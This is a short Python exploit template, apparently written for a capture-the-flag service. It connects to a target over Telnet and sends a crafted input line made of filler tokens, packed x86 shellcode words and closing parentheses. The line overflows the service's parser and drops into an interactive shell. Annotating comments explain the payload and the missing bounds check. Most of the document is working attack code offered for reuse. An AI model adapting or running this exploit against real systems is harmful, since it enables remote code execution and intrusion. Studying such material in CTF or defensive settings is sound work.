Created May 18, 2015 15:27
from Pwning import *
# customs: for when the binary doesn't have NX enabled or mprotect/mmap is in the GOT table
# from Shellcode import *
# edit the template with your own name
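class CGC(Payload):
    """Exploit template for one remote CTF service reached over Telnet.

    Subclasses ``Payload`` (from the project-local ``Pwning`` module, not
    shown here). The constructor stores the target parameters and builds the
    connection object; ``pwnTarget`` sends a single crafted input line.

    Attributes:
        host: Target host name or address (left empty in the published copy).
        port: Target TCP port.
        mode: Target platform selector; per the original comments 0 is x86
            and 1 is x86_64.
        conn: ``Telnet`` object used for all traffic with the target.
    """

    def __init__(self):
        """Initialise the base payload, set the target and create the connection."""
        Payload.__init__(self)
        # NOTE(review): the published text read `Payload.__init__(self)[1] = ''`
        # and `Telnet([1],self.port)`. The `[1]` looks like a link-reference
        # marker left by text extraction where `self.host` stood; restored here
        # on that assumption - confirm against the original file.
        self.host = ''    # my Target host
        self.port = 4347  # my Target port
        self.mode = 0     # x86 target platform
        # self.mode = 1   x86_64 target platform
        self.conn = Telnet(self.host, self.port)

    # ok i go to pwn it :D
    def pwnTarget(self):
        """Send the crafted input line after the '> ' prompt, then go interactive.

        The line is built from three runs of space-separated tokens:
        285 filler values, eight hex words, and 25 closing parentheses.
        """
        # Wait for the service prompt before sending anything.
        self.conn.read_until('> ')
        # Filler: 285 copies of the token "0x41".
        pl = '0x41 '*285
        # Eight 32-bit hex words. The first six look like packed x86 machine
        # code (the byte pair cd 80, i.e. `int 0x80`, straddles word
        # boundaries) - presumably a small syscall stub; confirm against the
        # target. This only matters on a target whose data memory is
        # executable, which matches the file's header note about NX.
        pl+= "0x90909080 0xcd5b016a 0x58026a80 0xcd5a506a 0x5b036a59 0x5358036a 0x41 0x41"
        # 25 ") " tokens close the line. Presumably the target parser stores
        # tokens in fixed-size storage without a bounds check - that is the
        # condition this input depends on, and the check a fix would add.
        pl+= ') '*25
        self.conn.write(pl + '\n')
        self.conn.interact()  # pwn the shell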
# Instantiating CGC runs __init__, which builds the Telnet object for the
# configured host/port. pwnTarget() is not called anywhere in the visible
# code - presumably the Payload base class or the operator invokes it; confirm.
cgc = CGC()